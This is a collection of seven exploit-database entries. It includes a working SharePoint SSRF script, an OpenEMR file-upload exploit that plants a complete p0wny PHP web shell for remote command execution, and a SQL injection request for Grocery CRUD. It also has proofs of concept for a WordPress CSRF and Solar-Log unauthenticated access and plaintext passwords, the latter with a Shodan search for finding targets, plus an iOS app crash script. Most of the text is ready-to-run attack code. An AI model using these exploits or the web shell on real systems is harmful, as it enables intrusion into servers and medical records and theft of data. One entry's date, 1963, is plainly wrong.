
  1. # Exploit Title: n+otes 1.6.2 - Denial of Service (PoC) # Date: 06-09-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/n-otes/id596895960 # Version: 1.6.2 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  2. # Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF) # Date: 09 Jun 2021 # Exploit Author: Alex Birnberg # Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462 # Version: 16.0.10372.20060 # Tested on: Windows Server 2019 # CVE : CVE-2021-31950 #!/usr/bin/env python3 import html import random import string import xml.sax.saxutils import textwrap import requests import argparse import xml.etree.ElementTree as ET from requests_ntlm2 import HttpNtlmAuth from urllib.parse import urlencode, urlparse class Exploit: def __init__(self, args): o = urlparse(args.url) self.url = args.url self.service = o.path self.username = args.username self.password = args.password self.target = args.target self.headers = args.header self.method = args.request self.data = args.data self.content_type = args.content_type self.s = requests.Session() self.s.auth = HttpNtlmAuth(self.username, self.password) self.s.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' } self.s.proxies = { 'http': 'http://127.0.0.1:8080' } def trigger(self): headers = '' if self.headers: for header in self.headers: header = list(map(lambda x: x.strip(), header.split(':'))) if len(header) != 2: continue headers += '<dataurl:Header name="{}">{}</dataurl:Header>'.format(header[0], header[1]) method = '' bypass_local = '' if self.method and self.method.upper() == 'POST': method = 'HTTP Post' else: method = 'HTTP Get' bypass_local = '<dataurl:Arguments><dataurl:Argument Name="{0}">{0}</dataurl:Argument></dataurl:Arguments>'.format(''.join(random.choice(string.ascii_letters) for i in range(16))) content_type = '' if self.content_type and len(self.content_type): content_type = '<dataurl:ContentType>{}</dataurl:ContentType>'.format(self.content_type) data = '' if self.data and len(self.data): data = '<dataurl:PostData 
Encoding="Decode">{}</dataurl:PostData>'.format(html.escape(self.data).encode('ascii', 'xmlcharrefreplace').decode('utf-8')) query_xml = textwrap.dedent('''\ <udc:DataSource xmlns:udc="http://schemas.microsoft.com/data/udc" xmlns:udcs="http://schemas.microsoft.com/data/udc/soap" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dsp="http://schemas.microsoft.com/sharepoint/dsp" xmlns:dataurl="http://schemas.microsoft.com/sharepoint/dsp/xmlurl"> <udc:ConnectionInfo> <udcs:Location href="">XMLURLDataAdapter</udcs:Location> <soap:Header> <dsp:versions> </dsp:versions> <dsp:request method="query" /> </soap:Header> <soap:Body> <dsp:queryRequest> <dsp:ptQuery> <dataurl:Headers> <dataurl:Url href="{}" Method="{}"/> {} {} {} {} </dataurl:Headers> </dsp:ptQuery> </dsp:queryRequest> </soap:Body> </udc:ConnectionInfo> </udc:DataSource>'''.format(self.target, method, bypass_local, headers, data, content_type)) query_xml = xml.sax.saxutils.escape(query_xml.replace('\r', '').replace('\n', '')) data = textwrap.dedent('''\ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetXmlDataFromDataSource xmlns="http://microsoft.com/sharepoint/webpartpages"> <queryXml>{}</queryXml> </GetXmlDataFromDataSource> </soap:Body> </soap:Envelope>'''.format(query_xml)) r = self.soap('webpartpages', 'http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource', data) root = ET.fromstring(r.content) try: namespaces = { 'soap': 'http://schemas.xmlsoap.org/soap/envelope/' } value = list(root.find('soap:Body', namespaces).iter())[2] if value.tag == 'faultcode': print('Error:', list(root.find('soap:Body', namespaces).iter())[3].text) else: print(value.text) except: print(r.content) pass def soap(self, service, action, data): headers = { 'SOAPAction': '"{}"'.format(action), 'Host': 'localhost', 'Content-Type': 
'text/xml; charset=utf-8', } return self.s.post('{}/_vti_bin/{}.asmx'.format(self.url, service), headers=headers, data=data) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--url', help='Base URL', required=True, metavar='<url>') parser.add_argument('--username', help='Username of team site owner', required=True, metavar='<username>') parser.add_argument('--password', help='Password of team site owner', required=True, metavar='<password>') parser.add_argument('--target', help='Target URL to work with', required=True, metavar='<target>') parser.add_argument('-H', '--header', help='Pass custom header(s) to server', action='append', metavar='<header>') parser.add_argument('-X', '--request', help='Specify request command to use', metavar='<command>') parser.add_argument('-d', '--data', help='HTTP POST data', metavar='<data>') parser.add_argument('-c', '--content-type', help='Value for the "Content-Type" header', metavar='<type>') exploit = Exploit(parser.parse_args()) exploit.trigger()
  3. # Exploit Title: OpenEMR 5.0.0 - Remote Code Execution (Authenticated) # Date 10.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/5.0.0/openemr-5.0.0.zip/download # Version: 5.0.0 # Tested on: Windows 10 # CVE: CVE-2017-9380 # Documentation: https://github.com/Hacker5preme/Exploits#cve-2017-9380-exploit ''' Description: The OpenEMR application allows users from all roles to upload files. However, the application does not whitelist only certain type of files (e.g. PDF, JPG, PNG, DOCX, etc). At the contary, any type of files can be uploaded to the filesystem via the application. While OpenEMR recommends during the installation to restrict access to the repository hosting uploaded files, unfortunately, such recommendations are too often ignored by users and can result in full compromise of the web server and its data. ''' ''' Import required modules: ''' import argparse import requests import string import random ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Exploit for CVE-2017-9380') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT openemr_path = args.PATH username = args.USERNAME password = args.PASSWORD ''' Exploit: ''' # Authentication preparation: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' response = session.get(auth_chek_url) # Header (auth): header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; 
Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Referer': auth_chek_url, 'Upgrade-Insecure-Requests': '1', } # Body (auth): body = { 'new_login_session_management': '1', 'authProvider': 'Default', 'authUser': username, 'clearPass': password, 'languageChoice': '1' } # Authenticate: print('') print('[+] Authentication') auth = session.post(auth_url,headers=header, data=body) # Create random patient name: letters_up = string.ascii_uppercase letters_down = string.ascii_lowercase first_name = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(10)) surname = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(7)) print('') print('[+] Creating patient name randomly:') print(' [*] First Name: ' + first_name) print(' [*] Surname: ' + surname) # Registration preparation: url_reg = 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new_comprehensive_save.php' # Header (registration): header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Referer': 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new.php', 'Upgrade-Insecure-Requests': '1' } body = { 'form_cb_1': '1', 'form_title': 'Mr.', 'form_fname': first_name, 'form_mname': '', 'form_lname': surname, 'form_pubpid': '', 'form_DOB': '2021-05-04', 'form_sex': 'Male', 'form_ss': 
'', 'form_drivers_license': '', 'form_status': '', 'form_genericname1': '', 'form_genericval1': '', 'form_genericname2': '', 'form_genericval2': '', 'form_billing_note': '', 'form_street': '', 'form_city': '', 'form_state': '', 'form_postal_code': '', 'form_county': '', 'form_country_code': '', 'form_mothersname': '', 'form_contact_relationship': '', 'form_phone_contact': '', 'form_phone_home': '', 'form_phone_biz': '', 'form_phone_cell': '', 'form_email': '', 'form_email_direct': '', 'form_providerID': '', 'form_ref_providerID': '', 'form_pharmacy_id': '0', 'form_hipaa_notice': '', 'form_hipaa_voice': '', 'form_hipaa_message': '', 'form_hipaa_mail': '', 'form_hipaa_allowsms': '', 'form_hipaa_allowemail': '', 'form_allow_imm_reg_use': '', 'form_allow_imm_info_share': '', 'form_allow_health_info_ex': '', 'form_allow_patient_portal': '', 'form_care_team': '', 'form_cmsportal_login': '', 'form_imm_reg_status': '', 'form_imm_reg_stat_effdate': '', 'form_publicity_code': '', 'form_publ_code_eff_date': '', 'form_protect_indicator': '', 'form_prot_indi_effdate': '', 'form_industry': '', 'form_occupation': '', 'form_em_name': '', 'form_em_street': '', 'form_em_city': '', 'form_em_state': '', 'form_em_postal_code': '', 'form_em_country': '', 'form_language': '', 'form_ethnicity': '', 'form_family_size': '', 'form_financial_review': '', 'form_monthly_income': '', 'form_homeless': '', 'form_interpretter': '', 'form_migrantseasonal': '', 'form_referral_source': '', 'form_vfc': '', 'form_religion': '', 'form_deceased_date': '', 'form_deceased_reason': '', 'form_guardiansname': '', 'form_guardianrelationship': '', 'form_guardiansex': '', 'form_guardianaddress': '', 'form_guardiancity': '', 'form_guardianstate': '', 'form_guardianpostalcode': '', 'form_guardiancountry': '', 'form_guardianphone': '', 'form_guardianworkphone': '', 'form_guardianemail': '', 'i1provider': '', 'i1plan_name': '', 'i1effective_date': '', 'i1policy_number': '', 'i1group_number': '', 
'i1subscriber_employer': '', 'i1subscriber_employer_street': '', 'i1subscriber_employer_city': '', 'form_i1subscriber_employer_state': '', 'i1subscriber_employer_postal_code': '', 'form_i1subscriber_employer_country': '', 'i1subscriber_fname': '', 'i1subscriber_mname': '', 'i1subscriber_lname': '', 'form_i1subscriber_relationship': '', 'i1subscriber_DOB': '', 'i1subscriber_ss': '', 'form_i1subscriber_sex': '', 'i1subscriber_street': '', 'i1subscriber_city': '', 'form_i1subscriber_state': '', 'i1subscriber_postal_code': '', 'form_i1subscriber_country': '', 'i1subscriber_phone': '', 'i1copay': '', 'i1accept_assignment': 'TRUE', 'i2provider': '', 'i2plan_name': '', 'i2effective_date': '', 'i2policy_number': '', 'i2group_number': '', 'i2subscriber_employer': '', 'i2subscriber_employer_street': '', 'i2subscriber_employer_city': '', 'form_i2subscriber_employer_state': '', 'i2subscriber_employer_postal_code': '', 'form_i2subscriber_employer_country': '', 'i2subscriber_fname': '', 'i2subscriber_mname': '', 'i2subscriber_lname': '', 'form_i2subscriber_relationship': '', 'i2subscriber_DOB': '', 'i2subscriber_ss': '', 'form_i2subscriber_sex': '', 'i2subscriber_street': '', 'i2subscriber_city': '', 'form_i2subscriber_state': '', 'i2subscriber_postal_code': '', 'form_i2subscriber_country': '', 'i2subscriber_phone': '', 'i2copay': '', 'i2accept_assignment': 'TRUE', 'i3provider': '', 'i3plan_name': '', 'i3effective_date': '', 'i3policy_number': '', 'i3group_number': '', 'i3subscriber_employer': '', 'i3subscriber_employer_street': '', 'i3subscriber_employer_city': '', 'form_i3subscriber_employer_state': '', 'i3subscriber_employer_postal_code': '', 'form_i3subscriber_employer_country': '', 'i3subscriber_fname': '', 'i3subscriber_mname': '', 'i3subscriber_lname': '', 'form_i3subscriber_relationship': '', 'i3subscriber_DOB': '', 'i3subscriber_ss': '', 'form_i3subscriber_sex': '', 'i3subscriber_street': '', 'i3subscriber_city': '', 'form_i3subscriber_state': '', 
'i3subscriber_postal_code': '', 'form_i3subscriber_country': '', 'i3subscriber_phone': '', 'i3copay': '', 'i3accept_assignment': 'TRUE'} print('') print('[+] Registering patient:') x = session.post(url_reg, headers=header, data=body).text # Get Patient-ID: id = x[(x.find('pid=')+4):x.find('&')] print(' [*] ID-NUMBER: ' + id) # Construct upload URL: url_upload = 'http://' + target_ip + ':' + target_port + openemr_path + '/controller.php?document&upload&patient_id=' + id + '&parent_id=1&"' # Header (upload): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------370797319835249590062969815666", "Origin": 'http://' + target_ip, "Connection": "close", "Referer": url_upload, "Upgrade-Insecure-Requests": "1" } # Body (shell); I'm using p0wny shell: https://github.com/flozz/p0wny-shell body = "-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n64000000\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"file[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n 
\"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n 
border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span 
class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? 
currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n 
_updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event 
|| window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"destination\"\r\n\r\n\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"patient_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n4\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"process\"\r\n\r\ntrue\r\n-----------------------------370797319835249590062969815666--\r\n" # Exploit x = session.post(url_upload, headers=header,data=body).text print('') print('[+] Uploading your Webshell') b = x[x.find('documents/') + 10:] c = b[:b.find('<')] webshellpath = 
'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/documents/' + c print(' [*] Webshell: ' + webshellpath) print('')
  4. # Exploit Title: Solar-Log 500 2.8.2 - Incorrect Access Control # Google Dork: In the Shodan search engine, the filter is "Server: IPC@CHIP" # Date: 2021-06-11 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.solar-log.com/en/ # Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/ # Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013 # Tested on: It is a proprietary device: https://www.solar-log.com/en/support/firmware/ # 1. Description: # The web administration server of Solar-Log 500, all versions prior to 2.8.2 Build 52, does not require authentication, # which allows arbitrary remote attackers to gain administrative privileges by connecting to the server. # As a result, the attacker can modify configuration files and change the system status. # 2. Proof of Concept: # Access /lan.html on the Solar-Log 500 without ANY authentication, # and you gain administrative privileges to modify configuration files and change the system status. # http://<Your Modem IP>/lan.html
  5. # Exploit Title: Solar-Log 500 2.8.2 - Unprotected Storage of Credentials # Google Dork: In the Shodan search engine, the filter is "Server: IPC@CHIP" # Date: 2021-06-11 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.solar-log.com/en/ # Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/ # Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013 # Tested on: It is a proprietary device: https://www.solar-log.com/en/support/firmware/ # 1. Description: # An issue was discovered in Solar-Log 500 prior to 2.8.2 Build 52 - 23.04.2013. # In /export.html, email.html and sms.html, the device stores plaintext passwords, # which may allow sensitive information to be read by someone with access to the device. # 2. Proof of Concept: # Browsing the configuration pages of the Solar-Log 500, # one can see that the passwords of the FTP, SMTP and SMS services are stored in plaintext. # http://<Your Modem IP>/export.html # http://<Your Modem IP>/email.html # http://<Your Modem IP>/sms.html
  6. # Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection # Date: 11/06/1963 # Exploit Author: TonyShavez # Vendor Homepage: https://www.grocerycrud.com/ # Software Link: https://www.grocerycrud.com/downloads # Version: < v2.0.1 # Tested on: [Linux Ubuntu] Proof of Concept: ======================= # Request: POST /path/to/ajax_list HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 68 DNT: 1 Connection: close page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text= ======================= # Vulnerable parameter: order_by ======================= # Type: [error-based]
  7. # Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF # Date: 2/10/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/database-backups/ # Version: 1.2.2.6 # Tested on: Windows 10 # CVE: CVE-2021-24174 1. Description: This plugin allows admins to create and download database backups. A CSRF attack can trigger the creation of DB backups, which are stored publicly in the uploads directory. 2. Proof of Concept: <form action="http://localhost/wp-admin/tools.php?page=database-backups" method="post"> <input type="hidden" name="do_backup_manually" value="1"> <input type="submit" class="button button-primary" value="Do backup" autocomplete="off"> </form> Backups can be accessed at the following URL: http://localhost/wp-content/uploads/database-backups/
